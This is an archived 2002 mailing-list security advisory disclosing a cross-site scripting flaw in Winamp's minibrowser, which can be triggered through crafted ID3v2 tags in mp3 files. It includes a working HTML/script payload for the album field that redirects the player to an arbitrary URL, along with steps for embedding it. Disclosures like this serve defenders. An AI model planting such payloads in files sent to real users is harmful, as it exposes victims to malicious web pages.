Winamp: Mp3 file can control the minibrowser

From: Andreas Sandblad (sandbladat_private)
Date: Wed Apr 03 2002 - 03:23:17 PST

Next message: Jonas Eriksson: "Re: packet filter fingerprinting(open but closed, closed but filtered)"

Previous message: Eric: "RE: MS 3/28/02 Security Patch for IE6 - warning!"
Next in thread: Security: "Re: Winamp: Mp3 file can control the minibrowser"
Reply: Security: "Re: Winamp: Mp3 file can control the minibrowser"
Reply: Daniel Lorch: "Re: Winamp: Mp3 file can control the minibrowser"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Title:      Winamp: Mp3 file can control the minibrowser
Date:       [2002-04-3]
Tested env: Winamp 2.78c, 2.79 with Win2000 Pro
Impact:     A special crafted mp3 file can control the
            minibrowser, such as directing to arbitrary
            webpage possibly containing mallicious
            html code. Also another "call home" issue.
Status:     Winamp contacted over two weeks ago,
            no response.
Vendor fix: Non. The fix should be on the server side.
Workaround: Disable minibrowser.                   _     _
            (enabled by default)                 o' \,=./ `o
Author:     Andreas Sandblad, sandbladat_private   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--

PROBLEM:
Winamp has a built-in minibrowser to show information about songs beeing
played (enabled by default). For every song currently playing Winamp will
direct the minibrowser to an url like
http://info.winamp.com/winamp/WA.html?Alb=&Art=Love
Project&Cid=winamp&Tid=&Track=Brick
Winamp gets the title/artist/album information from the ID3v1/ID3v2 tag in
the mp3 file. The problem is that the html page doesn't filter "<" and ">"
characters making it possible to inject htmlcode to control the
minibrowser (yet another CSS problem).

EXPLOIT:
Every field in the ID3v1 tag is limited to max. 32 bytes so we use the
ID3v2 tag instead. It seems that Winamp has made some useless efforts to
stop our attack, namely to convert " and ' to \" and \' (server side).
This will of course not stop us.

So lets put the following html code in the album field of the ID3v2 tag of
our mp3-file:
<mp3 id=m src=http://ANYURL><script>location=m.src</script>
It will direct the user to http://ANYURL on load.

Adding an ID3v2 tag to a mp3 file is very simple. Open the file in Winamp,
right click on it and choose "File info". Unmark the ID3v1 tag and mark
ID3v2. Add the html code in the album field. Sometimes Winamp will
complain when creating the ID3v2 tag with some characters. Then you simply
have to hexedit the mp3 file instead.

                                                   _     _
                                                 o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo--
Andreas Sandblad, student in Engineering Physics
at the University of Umea, Sweden.
---------------------------------------------------------------

Next message: Jonas Eriksson: "Re: packet filter fingerprinting(open but closed, closed but filtered)"
Previous message: Eric: "RE: MS 3/28/02 Security Patch for IE6 - warning!"
Next in thread: Security: "Re: Winamp: Mp3 file can control the minibrowser"
Reply: Security: "Re: Winamp: Mp3 file can control the minibrowser"
Reply: Daniel Lorch: "Re: Winamp: Mp3 file can control the minibrowser"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 09:16:54 PST